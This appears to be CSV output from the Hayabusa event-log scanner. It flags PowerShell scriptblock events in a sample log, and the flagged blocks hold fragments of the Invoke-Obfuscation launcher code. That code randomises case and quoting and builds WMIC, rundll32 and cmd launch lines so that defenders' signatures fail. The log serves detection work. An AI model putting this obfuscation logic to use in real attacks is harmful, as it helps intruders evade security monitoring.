$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
$CharCastDoubleQuote = ([Char[]](Get-Random -Input @('[String][Char]34','([Char]34).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace('""','').Length -le 5) { # Replace double quote(s) with randomly selected ASCII value conversion representation -- inline concatenation. $SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastDoubleQuote + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace('""',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. 
$RandomVarNameMaybeConcatenated = $RandomVarName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. 
$SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. 
$RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. 
$ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax # Set argument info for process tree output after this Switch block. 
$ArgsDefenderWillSee += , @($PathToRunDll , $RunDllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToRunDll + $RunDllCmdSyntax } 5 { ########## ## VAR+ ## ########## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable name to store the $ScriptString command. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. $InvokeVariableSyntax = Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName # Generate random case syntax for setting the above random variable name. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. 
$SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Build out command line syntax in reverse so we can di",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastDoubleQuote + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace double quotes with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of double quotes to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace('""',""`${$RandomVarName}"") } } # Randomly select a syntax for the Char conversion of a comma ASCII value and then ramdomize the case. $CharCastComma= ([Char[]](Get-Random -Input @('[String][Char]44','([Char]44).ToString()')) | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' If($ScriptString.Length-$ScriptString.Replace(',','').Length -le 5) { # Replace commas with randomly selected ASCII value conversion representation -- inline concatenation. 
$SubstitutionSyntax = ('\""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $CharCastComma + ' '*(Get-Random -Minimum 0 -Maximum 3) + '+' + ' '*(Get-Random -Minimum 0 -Maximum 3) + '\""') $ScriptString = $ScriptString.Replace(',',$SubstitutionSyntax).Replace('\""\""+','').Replace('\""\"" +','').Replace('\""\"" +','').Replace('\""\"" +','') } Else { # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(1..2)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. $RandomVarNameMaybeConcatenated = $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName ""'"") + ')' } # Generate random variable SET syntax. 
$RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $CharCastComma $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $CharCastComma + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Replace commas with randomly selected ASCII value conversion representation -- variable replacement to save space for high counts of commas to substitute. $SetVariables += $RandomVarSet + ' '*(Get-Random @(1..2)) + ';' $ScriptString = $ScriptString.Replace(',',""`${$RandomVarName}"") } # Encapsulate entire command with escaped double quotes since entire command is now an inline concatenated string to support the above character substitution(s). $ScriptString = '\""' + $ScriptString + '\""' # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. # Keep running Out-EncapsulatedInvokeExpression until we get a syntax that does NOT contain commas. # Examples like .((gv '*mdR*').Name[3,11,2]-Join'') can have their commas escaped like in above step. However, wmic.exe errors with opening [ without a closing ] in the string literal. $ScriptStringTemp = ',' While($ScriptStringTemp.Contains(',')) { $ScriptStringTemp = Out-EncapsulatedInvokeExpression $ScriptString } # Now that we have an invocation syntax that does not contain commas we will set $ScriptStringTemp's results back into $ScriptString. $ScriptString = $ScriptStringTemp # Prepend with $SetVariables (which will be blank if no variables were set in above sustitution logic depending on the number of double quotes and commas that need to be replaced. 
$ScriptString = $SetVariables + $ScriptString } # Generate random case syntax for PROCESS CALL CREATE arguments for WMIC.exe. $WmicArguments = ([Char[]]'process call create' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomize the whitespace between each element of $WmicArguments which randomly deciding between encapsulating each argument with single quotes, double quotes or no quote. $WmicArguments = (($WmicArguments.Split(' ') | ForEach-Object {$RandomQuotes = (Get-Random -Input @('""',""'"",' ')); $RandomQuotes + $_ + $RandomQuotes + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '').Trim() # Pair escaped double quotes with a prepended additional double quote so that wmic.exe does not treat the string as a separate argument for wmic.exe but the double quote still exists for powershell.exe's functionality. If($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""\""') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + $ScriptString $WmicCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $WmicArguments + ' '*(Get-Random -Minimum 1 -Maximum 4) + '""' + $PathToPowerShell + $PSCmdSyntax + '""' # Set argument info for process tree output after this Switch block. # Even though wmic.exe will show in command line arguments, it will not be the parent process of powershell.exe. Instead, the already-existing instance of WmiPrvSE.exe will spawn powershell.exe. 
$ArgsDefenderWillSee += , @(""[Unrelated to WMIC.EXE execution] C:\WINDOWS\system32\wbem\wmiprvse.exe"", "" -secured -Embedding"") $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToWmic + $WmicCmdSyntax } 4 { ############ ## RUNDLL ## ############ # Shout out and big thanks to Matt Graeber (@mattifestation) for pointing out this method of executing any binary directly from rundll32.exe. # Undo escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Generate random case syntax for SHELL32.DLL argument for RunDll32.exe. $Shell32Dll = ([Char[]]'SHELL32.DLL' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Put the execution flags in the format required by rundll32.exe: each argument separately encapusulated in double quotes. $ExecutionFlagsRunDllSyntax = ($PowerShellFlagsArray | Where-Object {$_.Trim().Length -gt 0} | ForEach-Object {'""' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$ScriptString`"""" $RunDllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + 